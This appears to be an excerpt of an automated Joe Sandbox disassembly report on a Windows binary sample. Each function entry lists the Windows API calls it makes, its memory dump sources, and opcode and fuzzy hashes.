                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                • GetFocus.USER32 ref: 0046157B
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                • __swprintf.LIBCMT ref: 00461608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                • String ID: %s%d
                                                • API String ID: 2645982514-1110647743
                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$FreeLoad
                                                • String ID:
                                                • API String ID: 2449869053-0
                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                • String ID:
                                                • API String ID: 3539004672-0
                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID:
                                                • API String ID: 327565842-0
                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Enum$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 2095303065-0
                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: RectWindow
                                                • String ID:
                                                • API String ID: 861336768-0
                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 00449598
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                • _wcslen.LIBCMT ref: 0044960D
                                                • _wcslen.LIBCMT ref: 0044961A
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 1856069659-0
                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                • TrackPopupMenuEx.USER32(009E6470,00000000,00000000,?,?,00000000), ref: 00447991
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CursorMenuPopupTrack$Proc
                                                • String ID:
                                                • API String ID: 1300944170-0
                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 1822080540-0
                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 659298297-0
                                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(009E1B90,000000F1,00000000,00000000), ref: 00440E6E
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(009E1B90,000000F1,00000001,00000000), ref: 00440E9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
